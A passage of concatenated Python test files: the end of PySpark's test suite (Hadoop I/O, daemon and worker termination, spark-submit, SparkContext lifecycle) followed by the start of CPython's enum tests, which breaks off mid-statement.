"org.apache.hadoop.io.IntWritable", "mapred.output.value.class": "org.apache.spark.api.python.DoubleArrayWritable", "mapred.output.dir": basepath + "/newdataset/" } self.sc.parallelize(array_data).saveAsNewAPIHadoopDataset( conf, valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter") input_conf = {"mapred.input.dir": basepath + "/newdataset/"} new_dataset = sorted(self.sc.newAPIHadoopRDD( "org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat", "org.apache.hadoop.io.IntWritable", "org.apache.spark.api.python.DoubleArrayWritable", valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter", conf=input_conf).collect()) self.assertEqual(new_dataset, array_data) def test_newolderror(self): basepath = self.tempdir.name rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x)) self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile( basepath + "/newolderror/saveAsHadoopFile/", "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")) self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile( basepath + "/newolderror/saveAsNewAPIHadoopFile/", "org.apache.hadoop.mapred.SequenceFileOutputFormat")) def test_bad_inputs(self): basepath = self.tempdir.name rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x)) self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile( basepath + "/badinputs/saveAsHadoopFile/", "org.apache.hadoop.mapred.NotValidOutputFormat")) self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile( basepath + "/badinputs/saveAsNewAPIHadoopFile/", "org.apache.hadoop.mapreduce.lib.output.NotValidOutputFormat")) def test_converters(self): # use of custom converters basepath = self.tempdir.name data = [(1, {3.0: u'bb'}), (2, {1.0: u'aa'}), (3, {2.0: u'dd'})] self.sc.parallelize(data).saveAsNewAPIHadoopFile( basepath + "/converters/", "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat", keyConverter="org.apache.spark.api.python.TestOutputKeyConverter", 
valueConverter="org.apache.spark.api.python.TestOutputValueConverter") converted = sorted(self.sc.sequenceFile(basepath + "/converters/").collect()) expected = [(u'1', 3.0), (u'2', 1.0), (u'3', 2.0)] self.assertEqual(converted, expected) def test_reserialization(self): basepath = self.tempdir.name x = range(1, 5) y = range(1001, 1005) data = list(zip(x, y)) rdd = self.sc.parallelize(x).zip(self.sc.parallelize(y)) rdd.saveAsSequenceFile(basepath + "/reserialize/sequence") result1 = sorted(self.sc.sequenceFile(basepath + "/reserialize/sequence").collect()) self.assertEqual(result1, data) rdd.saveAsHadoopFile( basepath + "/reserialize/hadoop", "org.apache.hadoop.mapred.SequenceFileOutputFormat") result2 = sorted(self.sc.sequenceFile(basepath + "/reserialize/hadoop").collect()) self.assertEqual(result2, data) rdd.saveAsNewAPIHadoopFile( basepath + "/reserialize/newhadoop", "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat") result3 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newhadoop").collect()) self.assertEqual(result3, data) conf4 = { "mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat", "mapred.output.key.class": "org.apache.hadoop.io.IntWritable", "mapred.output.value.class": "org.apache.hadoop.io.IntWritable", "mapred.output.dir": basepath + "/reserialize/dataset"} rdd.saveAsHadoopDataset(conf4) result4 = sorted(self.sc.sequenceFile(basepath + "/reserialize/dataset").collect()) self.assertEqual(result4, data) conf5 = {"mapreduce.outputformat.class": "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat", "mapred.output.key.class": "org.apache.hadoop.io.IntWritable", "mapred.output.value.class": "org.apache.hadoop.io.IntWritable", "mapred.output.dir": basepath + "/reserialize/newdataset"} rdd.saveAsNewAPIHadoopDataset(conf5) result5 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newdataset").collect()) self.assertEqual(result5, data) def test_malformed_RDD(self): basepath = 
self.tempdir.name # non-batch-serialized RDD[[(K, V)]] should be rejected data = [[(1, "a")], [(2, "aa")], [(3, "aaa")]] rdd = self.sc.parallelize(data, len(data)) self.assertRaises(Exception, lambda: rdd.saveAsSequenceFile( basepath + "/malformed/sequence")) class DaemonTests(unittest.TestCase): def connect(self, port): from socket import socket, AF_INET, SOCK_STREAM sock = socket(AF_INET, SOCK_STREAM) sock.connect(('127.0.0.1', port)) # send a split index of -1 to shutdown the worker sock.send(b"\xFF\xFF\xFF\xFF") sock.close() return True def do_termination_test(self, terminator): from subprocess import Popen, PIPE from errno import ECONNREFUSED # start daemon daemon_path = os.path.join(os.path.dirname(__file__), "daemon.py") daemon = Popen([sys.executable, daemon_path], stdin=PIPE, stdout=PIPE) # read the port number port = read_int(daemon.stdout) # daemon should accept connections self.assertTrue(self.connect(port)) # request shutdown terminator(daemon) time.sleep(1) # daemon should no longer accept connections try: self.connect(port) except EnvironmentError as exception: self.assertEqual(exception.errno, ECONNREFUSED) else: self.fail("Expected EnvironmentError to be raised") def test_termination_stdin(self): """Ensure that daemon and workers terminate when stdin is closed.""" self.do_termination_test(lambda daemon: daemon.stdin.close()) def test_termination_sigterm(self): """Ensure that daemon and workers terminate on SIGTERM.""" from signal import SIGTERM self.do_termination_test(lambda daemon: os.kill(daemon.pid, SIGTERM)) class WorkerTests(ReusedPySparkTestCase): def test_cancel_task(self): temp = tempfile.NamedTemporaryFile(delete=True) temp.close() path = temp.name def sleep(x): import os import time with open(path, 'w') as f: f.write("%d %d" % (os.getppid(), os.getpid())) time.sleep(100) # start job in background thread def run(): try: self.sc.parallelize(range(1), 1).foreach(sleep) except Exception: pass import threading t = threading.Thread(target=run) 
t.daemon = True t.start() daemon_pid, worker_pid = 0, 0 while True: if os.path.exists(path): with open(path) as f: data = f.read().split(' ') daemon_pid, worker_pid = map(int, data) break time.sleep(0.1) # cancel jobs self.sc.cancelAllJobs() t.join() for i in range(50): try: os.kill(worker_pid, 0) time.sleep(0.1) except OSError: break # worker was killed else: self.fail("worker has not been killed after 5 seconds") try: os.kill(daemon_pid, 0) except OSError: self.fail("daemon had been killed") # run a normal job rdd = self.sc.parallelize(range(100), 1) self.assertEqual(100, rdd.map(str).count()) def test_after_exception(self): def raise_exception(_): raise Exception() rdd = self.sc.parallelize(range(100), 1) with QuietTest(self.sc): self.assertRaises(Exception, lambda: rdd.foreach(raise_exception)) self.assertEqual(100, rdd.map(str).count()) def test_after_jvm_exception(self): tempFile = tempfile.NamedTemporaryFile(delete=False) tempFile.write(b"Hello World!") tempFile.close() data = self.sc.textFile(tempFile.name, 1) filtered_data = data.filter(lambda x: True) self.assertEqual(1, filtered_data.count()) os.unlink(tempFile.name) with QuietTest(self.sc): self.assertRaises(Exception, lambda: filtered_data.count()) rdd = self.sc.parallelize(range(100), 1) self.assertEqual(100, rdd.map(str).count()) def test_accumulator_when_reuse_worker(self): from pyspark.accumulators import INT_ACCUMULATOR_PARAM acc1 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM) self.sc.parallelize(range(100), 20).foreach(lambda x: acc1.add(x)) self.assertEqual(sum(range(100)), acc1.value) acc2 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM) self.sc.parallelize(range(100), 20).foreach(lambda x: acc2.add(x)) self.assertEqual(sum(range(100)), acc2.value) self.assertEqual(sum(range(100)), acc1.value) def test_reuse_worker_after_take(self): rdd = self.sc.parallelize(range(100000), 1) self.assertEqual(0, rdd.first()) def count(): try: rdd.count() except Exception: pass t = threading.Thread(target=count) 
t.daemon = True t.start() t.join(5) self.assertTrue(not t.isAlive()) self.assertEqual(100000, rdd.count()) def test_with_different_versions_of_python(self): rdd = self.sc.parallelize(range(10)) rdd.count() version = self.sc.pythonVer self.sc.pythonVer = "2.0" try: with QuietTest(self.sc): self.assertRaises(Py4JJavaError, lambda: rdd.count()) finally: self.sc.pythonVer = version class SparkSubmitTests(unittest.TestCase): def setUp(self): self.programDir = tempfile.mkdtemp() self.sparkSubmit = os.path.join(os.environ.get("SPARK_HOME"), "bin", "spark-submit") def tearDown(self): shutil.rmtree(self.programDir) def createTempFile(self, name, content, dir=None): """ Create a temp file with the given name and content and return its path. Strips leading spaces from content up to the first '|' in each line. """ pattern = re.compile(r'^ *\|', re.MULTILINE) content = re.sub(pattern, '', content.strip()) if dir is None: path = os.path.join(self.programDir, name) else: os.makedirs(os.path.join(self.programDir, dir)) path = os.path.join(self.programDir, dir, name) with open(path, "w") as f: f.write(content) return path def createFileInZip(self, name, content, ext=".zip", dir=None, zip_name=None): """ Create a zip archive containing a file with the given content and return its path. Strips leading spaces from content up to the first '|' in each line. 
""" pattern = re.compile(r'^ *\|', re.MULTILINE) content = re.sub(pattern, '', content.strip()) if dir is None: path = os.path.join(self.programDir, name + ext) else: path = os.path.join(self.programDir, dir, zip_name + ext) zip = zipfile.ZipFile(path, 'w') zip.writestr(name, content) zip.close() return path def create_spark_package(self, artifact_name): group_id, artifact_id, version = artifact_name.split(":") self.createTempFile("%s-%s.pom" % (artifact_id, version), (""" |<?xml version="1.0" encoding="UTF-8"?> |<project xmlns="http://maven.apache.org/POM/4.0.0" | xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" | xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 | http://maven.apache.org/xsd/maven-4.0.0.xsd"> | <modelVersion>4.0.0</modelVersion> | <groupId>%s</groupId> | <artifactId>%s</artifactId> | <version>%s</version> |</project> """ % (group_id, artifact_id, version)).lstrip(), os.path.join(group_id, artifact_id, version)) self.createFileInZip("%s.py" % artifact_id, """ |def myfunc(x): | return x + 1 """, ".jar", os.path.join(group_id, artifact_id, version), "%s-%s" % (artifact_id, version)) def test_single_script(self): """Submit and test a single script file""" script = self.createTempFile("test.py", """ |from pyspark import SparkContext | |sc = SparkContext() |print(sc.parallelize([1, 2, 3]).map(lambda x: x * 2).collect()) """) proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE) out, err = proc.communicate() self.assertEqual(0, proc.returncode) self.assertIn("[2, 4, 6]", out.decode('utf-8')) def test_script_with_local_functions(self): """Submit and test a single script file calling a global function""" script = self.createTempFile("test.py", """ |from pyspark import SparkContext | |def foo(x): | return x * 3 | |sc = SparkContext() |print(sc.parallelize([1, 2, 3]).map(foo).collect()) """) proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE) out, err = proc.communicate() self.assertEqual(0, 
proc.returncode) self.assertIn("[3, 6, 9]", out.decode('utf-8')) def test_module_dependency(self): """Submit and test a script with a dependency on another module""" script = self.createTempFile("test.py", """ |from pyspark import SparkContext |from mylib import myfunc | |sc = SparkContext() |print(sc.parallelize([1, 2, 3]).map(myfunc).collect()) """) zip = self.createFileInZip("mylib.py", """ |def myfunc(x): | return x + 1 """) proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, script], stdout=subprocess.PIPE) out, err = proc.communicate() self.assertEqual(0, proc.returncode) self.assertIn("[2, 3, 4]", out.decode('utf-8')) def test_module_dependency_on_cluster(self): """Submit and test a script with a dependency on another module on a cluster""" script = self.createTempFile("test.py", """ |from pyspark import SparkContext |from mylib import myfunc | |sc = SparkContext() |print(sc.parallelize([1, 2, 3]).map(myfunc).collect()) """) zip = self.createFileInZip("mylib.py", """ |def myfunc(x): | return x + 1 """) proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, "--master", "local-cluster[1,1,512]", script], stdout=subprocess.PIPE) out, err = proc.communicate() self.assertEqual(0, proc.returncode) self.assertIn("[2, 3, 4]", out.decode('utf-8')) def test_package_dependency(self): """Submit and test a script with a dependency on a Spark Package""" script = self.createTempFile("test.py", """ |from pyspark import SparkContext |from mylib import myfunc | |sc = SparkContext() |print(sc.parallelize([1, 2, 3]).map(myfunc).collect()) """) self.create_spark_package("a:mylib:0.1") proc = subprocess.Popen([self.sparkSubmit, "--packages", "a:mylib:0.1", "--repositories", "file:" + self.programDir, script], stdout=subprocess.PIPE) out, err = proc.communicate() self.assertEqual(0, proc.returncode) self.assertIn("[2, 3, 4]", out.decode('utf-8')) def test_package_dependency_on_cluster(self): """Submit and test a script with a dependency on a Spark Package on a 
cluster""" script = self.createTempFile("test.py", """ |from pyspark import SparkContext |from mylib import myfunc | |sc = SparkContext() |print(sc.parallelize([1, 2, 3]).map(myfunc).collect()) """) self.create_spark_package("a:mylib:0.1") proc = subprocess.Popen([self.sparkSubmit, "--packages", "a:mylib:0.1", "--repositories", "file:" + self.programDir, "--master", "local-cluster[1,1,512]", script], stdout=subprocess.PIPE) out, err = proc.communicate() self.assertEqual(0, proc.returncode) self.assertIn("[2, 3, 4]", out.decode('utf-8')) def test_single_script_on_cluster(self): """Submit and test a single script on a cluster""" script = self.createTempFile("test.py", """ |from pyspark import SparkContext | |def foo(x): | return x * 2 | |sc = SparkContext() |print(sc.parallelize([1, 2, 3]).map(foo).collect()) """) # this will fail if you have different spark.executor.memory # in conf/spark-defaults.conf proc = subprocess.Popen( [self.sparkSubmit, "--master", "local-cluster[1,1,512]", script], stdout=subprocess.PIPE) out, err = proc.communicate() self.assertEqual(0, proc.returncode) self.assertIn("[2, 4, 6]", out.decode('utf-8')) class ContextTests(unittest.TestCase): def test_failed_sparkcontext_creation(self): # Regression test for SPARK-1550 self.assertRaises(Exception, lambda: SparkContext("an-invalid-master-name")) def test_stop(self): sc = SparkContext() self.assertNotEqual(SparkContext._active_spark_context, None) sc.stop() self.assertEqual(SparkContext._active_spark_context, None) def test_with(self): with SparkContext() as sc: self.assertNotEqual(SparkContext._active_spark_context, None) self.assertEqual(SparkContext._active_spark_context, None) def test_with_exception(self): try: with SparkContext() as sc: self.assertNotEqual(SparkContext._active_spark_context, None) raise Exception() except: pass self.assertEqual(SparkContext._active_spark_context, None) def test_with_stop(self): with SparkContext() as sc: 
self.assertNotEqual(SparkContext._active_spark_context, None) sc.stop() self.assertEqual(SparkContext._active_spark_context, None) def test_progress_api(self): with SparkContext() as sc: sc.setJobGroup('test_progress_api', '', True) rdd = sc.parallelize(range(10)).map(lambda x: time.sleep(100)) def run(): try: rdd.count() except Exception: pass t = threading.Thread(target=run) t.daemon = True t.start() # wait for scheduler to start time.sleep(1) tracker = sc.statusTracker() jobIds = tracker.getJobIdsForGroup('test_progress_api') self.assertEqual(1, len(jobIds)) job = tracker.getJobInfo(jobIds[0]) self.assertEqual(1, len(job.stageIds)) stage = tracker.getStageInfo(job.stageIds[0]) self.assertEqual(rdd.getNumPartitions(), stage.numTasks) sc.cancelAllJobs() t.join() # wait for event listener to update the status time.sleep(1) job = tracker.getJobInfo(jobIds[0]) self.assertEqual('FAILED', job.status) self.assertEqual([], tracker.getActiveJobsIds()) self.assertEqual([], tracker.getActiveStageIds()) sc.stop() @unittest.skipIf(not _have_scipy, "SciPy not installed") class SciPyTests(PySparkTestCase): """General PySpark tests that depend on scipy """ def test_serialize(self): from scipy.special import gammaln x = range(1, 5) expected = list(map(gammaln, x)) observed = self.sc.parallelize(x).map(gammaln).collect() self.assertEqual(expected, observed) @unittest.skipIf(not _have_numpy, "NumPy not installed") class NumPyTests(PySparkTestCase): """General PySpark tests that depend on numpy """ def test_statcounter_array(self): x = self.sc.parallelize([np.array([1.0, 1.0]), np.array([2.0, 2.0]), np.array([3.0, 3.0])]) s = x.stats() self.assertSequenceEqual([2.0, 2.0], s.mean().tolist()) self.assertSequenceEqual([1.0, 1.0], s.min().tolist()) self.assertSequenceEqual([3.0, 3.0], s.max().tolist()) self.assertSequenceEqual([1.0, 1.0], s.sampleStdev().tolist()) if __name__ == "__main__": if not _have_scipy: print("NOTE: Skipping SciPy tests as it does not seem to be installed") if 
not _have_numpy: print("NOTE: Skipping NumPy tests as it does not seem to be installed") unittest.main() if not _have_scipy: print("NOTE: SciPy tests were skipped as it does not seem to be installed") if not _have_numpy: print("NOTE: NumPy tests were skipped as it does not seem to be installed")
# ===== test_enum.py (start of embedded file) =====
import enum import doctest import inspect import os import pydoc import sys import unittest import threading from collections import OrderedDict from enum import Enum, IntEnum, StrEnum, EnumType, Flag, IntFlag, unique, auto from enum import STRICT, CONFORM, EJECT, KEEP, _simple_enum, _test_simple_enum from enum import verify, UNIQUE, CONTINUOUS, NAMED_FLAGS from io import StringIO from pickle import dumps, loads, PicklingError, HIGHEST_PROTOCOL from test import support from test.support import ALWAYS_EQ from test.support import threading_helper from datetime import timedelta python_version = sys.version_info[:2] def load_tests(loader, tests, ignore): tests.addTests(doctest.DocTestSuite(enum)) if os.path.exists('Doc/library/enum.rst'): tests.addTests(doctest.DocFileSuite( '../../Doc/library/enum.rst', optionflags=doctest.ELLIPSIS|doctest.NORMALIZE_WHITESPACE, )) return tests MODULE = ('test.test_enum', '__main__')[__name__=='__main__'] SHORT_MODULE = MODULE.split('.')[-1] # for pickle tests try: class Stooges(Enum): LARRY = 1 CURLY = 2 MOE = 3 except Exception as exc: Stooges = exc try: class IntStooges(int, Enum): LARRY = 1 CURLY = 2 MOE = 3 except Exception as exc: IntStooges = exc try: class FloatStooges(float, Enum): LARRY = 1.39 CURLY = 2.72 MOE = 3.142596 except Exception as exc: FloatStooges = exc try: class FlagStooges(Flag): LARRY = 1 CURLY = 2 MOE = 3 except Exception as exc: FlagStooges = exc # for pickle test and subclass tests class Name(StrEnum): BDFL = 'Guido van Rossum' FLUFL = 'Barry Warsaw' try: Question = Enum('Question', 'who what when where why', module=__name__) except Exception as exc: Question = exc try: Answer = Enum('Answer', 'him this then there because') except Exception as exc: Answer = exc try: Theory = Enum('Theory', 'rule law supposition', qualname='spanish_inquisition') except Exception as exc: Theory = exc # for doctests try: class Fruit(Enum): TOMATO = 1 BANANA = 2 CHERRY = 3 except Exception: pass def 
test_pickle_dump_load(assertion, source, target=None): if target is None: target = source for protocol in range(HIGHEST_PROTOCOL + 1): assertion(loads(dumps(source, protocol=protocol)), target) def test_pickle_exception(assertion, exception, obj): for protocol in range(HIGHEST_PROTOCOL + 1): with assertion(exception): dumps(obj, protocol=protocol) class TestHelpers(unittest.TestCase): # _is_descriptor, _is_sunder, _is_dunder def test_is_descriptor(self): class foo: pass for attr in ('__get__','__set__','__delete__'): obj = foo() self.assertFalse(enum._is_descriptor(obj)) setattr(obj, attr, 1) self.assertTrue(enum._is_descriptor(obj)) def test_is_sunder(self): for s in ('_a_', '_aa_'): self.assertTrue(enum._is_sunder(s)) for s in ('a', 'a_', '_a', '__a', 'a__', '__a__', '_a__', '__a_', '_', '__', '___', '____', '_____',): self.assertFalse(enum._is_sunder(s)) def test_is_dunder(self): for s in ('__a__', '__aa__'): self.assertTrue(enum._is_dunder(s)) for s in ('a', 'a_', '_a', '__a', 'a__', '_a_', '_a__', '__a_', '_', '__', '___', '____', '_____',): self.assertFalse(enum._is_dunder(s)) # for subclassing tests class classproperty: def __init__(self, fget=None, fset=None, fdel=None, doc=None): self.fget = fget self.fset = fset self.fdel = fdel if doc is None and fget is not None: doc = fget.__doc__ self.__doc__ = doc def __get__(self, instance, ownerclass): return self.fget(ownerclass) # for global repr tests @enum.global_enum class HeadlightsK(IntFlag, boundary=enum.KEEP): OFF_K = 0 LOW_BEAM_K = auto() HIGH_BEAM_K = auto() FOG_K = auto() @enum.global_enum class HeadlightsC(IntFlag, boundary=enum.CONFORM): OFF_C = 0 LOW_BEAM_C = auto() HIGH_BEAM_C = auto() FOG_C = auto() # tests class TestEnum(unittest.TestCase): def setUp(self): class Season(Enum): SPRING = 1 SUMMER = 2 AUTUMN = 3 WINTER = 4 self.Season = Season class Konstants(float, Enum): E = 2.7182818 PI = 3.1415926 TAU = 2 * PI self.Konstants = Konstants class Grades(IntEnum): A = 5 B = 4 C = 3 D = 2 F = 0 
self.Grades = Grades class Directional(str, Enum): EAST = 'east' WEST = 'west' NORTH = 'north' SOUTH = 'south' self.Directional = Directional from datetime import date class Holiday(date, Enum): NEW_YEAR = 2013, 1, 1 IDES_OF_MARCH = 2013, 3, 15 self.Holiday = Holiday class DateEnum(date, Enum): pass self.DateEnum = DateEnum class FloatEnum(float, Enum): pass self.FloatEnum = FloatEnum class Wowser(Enum): this = 'that' these = 'those' def wowser(self): """Wowser docstring""" return ("Wowser! I'm %s!" % self.name) @classmethod def classmethod_wowser(cls): pass @staticmethod def staticmethod_wowser(): pass self.Wowser = Wowser class IntWowser(IntEnum): this = 1 these = 2 def wowser(self): """Wowser docstring""" return ("Wowser! I'm %s!" % self.name) @classmethod def classmethod_wowser(cls): pass @staticmethod def staticmethod_wowser(): pass self.IntWowser = IntWowser class FloatWowser(float, Enum): this = 3.14 these = 4.2 def wowser(self): """Wowser docstring""" return ("Wowser! I'm %s!" % self.name) @classmethod def classmethod_wowser(cls): pass @staticmethod def staticmethod_wowser(): pass self.FloatWowser = FloatWowser class WowserNoMembers(Enum): def wowser(self): pass @classmethod def classmethod_wowser(cls): pass @staticmethod def staticmethod_wowser(): pass class SubclassOfWowserNoMembers(WowserNoMembers): pass self.WowserNoMembers = WowserNoMembers self.SubclassOfWowserNoMembers = SubclassOfWowserNoMembers class IntWowserNoMembers(IntEnum): def wowser(self): pass @classmethod def classmethod_wowser(cls): pass @staticmethod def staticmethod_wowser(): pass self.IntWowserNoMembers = IntWowserNoMembers class FloatWowserNoMembers(float, Enum): def wowser(self): pass @classmethod def classmethod_wowser(cls): pass @staticmethod def staticmethod_wowser(): pass self.FloatWowserNoMembers = FloatWowserNoMembers class EnumWithInit(Enum): def __init__(self, greeting, farewell): self.greeting = greeting self.farewell = farewell ENGLISH = 'hello', 'goodbye' GERMAN = 'Guten 
Morgen', 'Auf Wiedersehen' def some_method(self): pass self.EnumWithInit = EnumWithInit # see issue22506 class SuperEnum1(Enum): def invisible(self): return "did you see me?" class SubEnum1(SuperEnum1): sample = 5 self.SubEnum1 = SubEnum1 class SuperEnum2(IntEnum): def __new__(cls, value, description=""): obj = int.__new__(cls, value) obj._value_ = value obj.description = description return obj class SubEnum2(SuperEnum2): sample = 5 self.SubEnum2 = SubEnum2 def test_dir_basics_for_all_enums(self): enums_for_tests = ( # Generic enums in enum.py Enum, IntEnum, StrEnum, # Generic enums defined outside of enum.py self.DateEnum, self.FloatEnum, # Concrete enums derived from enum.py generics self.Grades, self.Season, # Concrete enums derived from generics defined outside of enum.py self.Konstants, self.Holiday, # Standard enum with added behaviour & members self.Wowser, # Mixin-enum-from-enum.py with added behaviour & members self.IntWowser, # Mixin-enum-from-oustide-enum.py with added behaviour & members self.FloatWowser, # Equivalents of the three immediately above, but with no members self.WowserNoMembers, self.IntWowserNoMembers, self.FloatWowserNoMembers, # Enum with members and an __init__ method self.EnumWithInit, # Special cases to test self.SubEnum1, self.SubEnum2 ) for cls in enums_for_tests: with self.subTest(cls=cls): cls_dir = dir(cls) # test that dir is deterministic self.assertEqual(cls_dir, dir(cls)) # test that dir is sorted self.assertEqual(list(cls_dir), sorted(cls_dir)) # test that there are no dupes in dir self.assertEqual(len(cls_dir), len(set(cls_dir))) # test that there are no sunders in dir self.assertFalse(any(enum._is_sunder(attr) for attr in cls_dir)) self.assertNotIn('__new__', cls_dir) for attr in ('__class__', '__doc__', '__members__', '__module__'): with self.subTest(attr=attr): self.assertIn(attr, cls_dir) def test_dir_for_enum_with_members(self): enums_for_test = ( # Enum with members self.Season, # IntEnum with members self.Grades, # 
Two custom-mixin enums with members self.Konstants, self.Holiday, # several enums-with-added-behaviour and members self.Wowser, self.IntWowser, self.FloatWowser, # An enum with an __init__ method and members self.EnumWithInit, # Special cases to test self.SubEnum1, self.SubEnum2 ) for cls in enums_for_test: cls_dir = dir(cls) member_names = cls._member_names_ with self.subTest(cls=cls): self.assertTrue(all(member_name in cls_dir for member_name in member_names)) for member in cls: member_dir = dir(member) # test that dir is deterministic self.assertEqual(member_dir, dir(member)) # test that dir is sorted self.assertEqual(list(member_dir), sorted(member_dir)) # test that there are no dupes in dir self.assertEqual(len(member_dir), len(set(member_dir))) for attr_name in cls_dir: with self.subTest(attr_name=attr_name): if attr_name in {'__members__', '__init__', '__new__', *member_names}: self.assertNotIn(attr_name, member_dir) else: self.assertIn(attr_name, member_dir) self.assertFalse(any(enum._is_sunder(attr) for attr in member_dir)) def test_dir_for_enums_with_added_behaviour(self): enums_for_test = ( self.Wowser, self.IntWowser, self.FloatWowser, self.WowserNoMembers, self.SubclassOfWowserNoMembers, self.IntWowserNoMembers, self.FloatWowserNoMembers ) for cls in enums_for_test: with self.subTest(cls=cls): self.assertIn('wowser', dir(cls)) self.assertIn('classmethod_wowser', dir(cls)) self.assertIn('staticmethod_wowser', dir(cls)) self.assertTrue(all( all(attr in dir(member) for attr in ('wowser', 'classmethod_wowser', 'staticmethod_wowser')) for member in cls )) self.assertEqual(dir(self.WowserNoMembers), dir(self.SubclassOfWowserNoMembers)) # Check classmethods are present self.assertIn('from_bytes', dir(self.IntWowser)) self.assertIn('from_bytes', dir(self.IntWowserNoMembers)) def test_help_output_on_enum_members(self): added_behaviour_enums = ( self.Wowser, self.IntWowser, self.FloatWowser ) for cls in added_behaviour_enums: with self.subTest(cls=cls): 
rendered_doc = pydoc.render_doc(cls.this) self.assertIn('Wowser docstring', rendered_doc) if cls in {self.IntWowser, self.FloatWowser}: self.assertIn('float(self)', rendered_doc) def test_dir_for_enum_with_init(self): EnumWithInit = self.EnumWithInit cls_dir = dir(EnumWithInit) self.assertIn('__init__', cls_dir) self.assertIn('some_method', cls_dir) self.assertNotIn('greeting', cls_dir) self.assertNotIn('farewell', cls_dir) member_dir = dir(EnumWithInit.ENGLISH) self.assertNotIn('__init__', member_dir) self.assertIn('some_method', member_dir) self.assertIn('greeting', member_dir) self.assertIn('farewell', member_dir) def test_mixin_dirs(self): from datetime import date enums_for_test = ( # generic mixins from enum.py (IntEnum, int), (StrEnum, str), # generic mixins from outside enum.py (self.FloatEnum, float), (self.DateEnum, date), # concrete mixin from enum.py (self.Grades, int), # concrete mixin from outside enum.py (self.Holiday, date), # concrete mixin from enum.py with added behaviour (self.IntWowser, int), # concrete mixin from outside enum.py with added behaviour (self.FloatWowser, float) ) enum_dict = Enum.__dict__ enum_dir = dir(Enum) enum_module_names = enum.__all__ is_from_enum_module = lambda cls: cls.__name__ in enum_module_names is_enum_dunder = lambda attr: enum._is_dunder(attr) and attr in enum_dict def attr_is_inherited_from_object(cls, attr_name): for base in cls.__mro__: if attr_name in base.__dict__: return base is object return False # General tests for enum_cls, mixin_cls in enums_for_test: with self.subTest(enum_cls=enum_cls): cls_dir = dir(enum_cls) cls_dict = enum_cls.__dict__ mixin_attrs = [ x for x in dir(mixin_cls) if not attr_is_inherited_from_object(cls=mixin_cls, attr_name=x) ] first_enum_base = next( base for base in enum_cls.__mro__ if is_from_enum_module(base) ) for attr in mixin_attrs: with self.subTest(attr=attr): if enum._is_sunder(attr): # Unlikely, but no harm in testing self.assertNotIn(attr, cls_dir) elif attr in 
{'__class__', '__doc__', '__members__', '__module__'}: self.assertIn(attr, cls_dir) elif is_enum_dunder(attr): if is_from_enum_module(enum_cls): self.assertNotIn(attr, cls_dir) elif getattr(enum_cls, attr) is getattr(first_enum_base, attr): self.assertNotIn(attr, cls_dir) else: self.assertIn(attr, cls_dir) else: self.assertIn(attr, cls_dir) # Some specific examples int_enum_dir = dir(IntEnum) self.assertIn('imag', int_enum_dir) self.assertIn('__rfloordiv__', int_enum_dir) self.assertNotIn('__format__', int_enum_dir) self.assertNotIn('__hash__', int_enum_dir) self.assertNotIn('__init_subclass__', int_enum_dir) self.assertNotIn('__subclasshook__', int_enum_dir) class OverridesFormatOutsideEnumModule(Enum): def __format__(self, *args, **kwargs): return super().__format__(*args, **kwargs) SOME_MEMBER = 1 self.assertIn('__format__', dir(OverridesFormatOutsideEnumModule)) self.assertIn('__format__', dir(OverridesFormatOutsideEnumModule.SOME_MEMBER)) def test_dir_on_sub_with_behavior_on_super(self): # see issue22506 self.assertEqual( set(dir(self.SubEnum1.sample)), set(['__class__', '__doc__', '__module__', 'name', 'value', 'invisible']), ) def test_dir_on_sub_with_behavior_including_instance_dict_on_super(self): # see issue40084 self.assertTrue({'description'} <= set(dir(self.SubEnum2.sample))) def test_enum_in_enum_out(self): Season = self.Season self.assertIs(Season(Season.WINTER), Season.WINTER) def test_enum_value(self): Season = self.Season self.assertEqual(Season.SPRING.value, 1) def test_intenum_value(self): self.assertEqual(IntStooges.CURLY.value, 2) def test_enum(self): Season = self.Season lst = list(Season) self.assertEqual(len(lst), len(Season)) self.assertEqual(len(Season), 4, Season) self.assertEqual( [Season.SPRING, Season.SUMMER, Season.AUTUMN, Season.WINTER], lst) for i, season in enumerate('SPRING SUMMER AUTUMN WINTER'.split(), 1): e = Season(i) self.assertEqual(e, getattr(Season, season)) self.assertEqual(e.value, i) self.assertNotEqual(e, i) 
self.assertEqual(e.name, season) self.assertIn(e, Season) self.assertIs(type(e), Season) self.assertIsInstance(e, Season) self.assertEqual(str(e), season) self.assertEqual(repr(e), 'Season.{0}'.format(season)) def test_value_name(self): Season = self.Season self.assertEqual(Season.SPRING.name, 'SPRING') self.assertEqual(Season.SPRING.value, 1) with self.assertRaises(AttributeError): Season.SPRING.name = 'invierno' with self.assertRaises(AttributeError): Season.SPRING.value = 2 def test_changing_member(self): Season = self.Season with self.assertRaises(AttributeError): Season.WINTER = 'really cold' def test_attribute_deletion(self): class Season(Enum): SPRING = 1 SUMMER = 2 AUTUMN = 3 WINTER = 4 def spam(cls): pass self.assertTrue(hasattr(Season, 'spam')) del Season.spam self.assertFalse(hasattr(Season, 'spam')) with self.assertRaises(AttributeError): del Season.SPRING with self.assertRaises(AttributeError): del Season.DRY with self.assertRaises(AttributeError): del Season.SPRING.name def test_bool_of_class(self): class Empty(Enum): pass self.assertTrue(bool(Empty)) def test_bool_of_member(self): class Count(Enum): zero = 0 one = 1 two = 2 for member in Count: self.assertTrue(bool(member)) def test_invalid_names(self): with 